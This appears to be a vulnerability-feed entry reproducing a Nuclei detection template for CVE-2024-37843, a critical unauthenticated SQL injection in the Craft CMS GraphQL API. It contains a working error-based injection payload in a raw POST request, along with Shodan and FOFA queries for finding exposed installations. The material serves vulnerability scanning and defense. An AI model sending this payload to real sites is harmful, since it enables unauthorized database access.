nuclei, ProjectDiscovery, NUCLEI:CVE-2024-37843
Jul 24, 2024 - 8:48 a.m.

Craft CMS <=v3.7.31 - SQL Injection

2024-07-24 08:48:47
ProjectDiscovery
github.com
Tags: cve, sql injection, craft_cms, graphql, vulnerability

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 8.1
Confidence: Low

EPSS: 0.693
Percentile: 98.1%

Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.

id: CVE-2024-37843

info:
  name: Craft CMS <=v3.7.31 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.
  reference:
    - https://blog.smithsecurity.biz/craft-cms-unauthenticated-sqli-via-graphql
    - https://github.com/gsmith257-cyber/CVE-2024-37843-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-37843
    cwe-id: CWE-89
    epss-score: 0.00091
    epss-percentile: 0.39447
    cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
  metadata:
    vendor: craftcms
    product: craft_cms
    shodan-query:
      - cpe:"cpe:2.3:a:craftcms:craft_cms"
      - http.html:"craftcms"
      - http.favicon.hash:"-47932290"
      - "X-Powered-By: Craft CMS"
    fofa-query:
      - body=craftcms
      - icon_hash=-47932290
    publicwww-query: craftcms
  tags: cve,cve2024,craftcms,sqli

variables:
  matcher: "{{rand_base(4)}}"

http:
  - raw:
      - |
        POST /api/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type:application/json

        {"query":"query  IntrospectionQuery  {assets(orderBy: \"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\", limit: 5){filename}}"}

    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "General error: 1105 XPATH syntax error: '\\n{{matcher}}"

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 490a00463044022002dca2f2b0925cbe4564e9abdf3f70b914472fcecde703539b7834ad0d4c8aea02207c9493c976a30ef2f6ad0e7be9a8c8edd366b67477a88c89ad7c574e50005def:922c64590222798bb761d5b6d8e72950
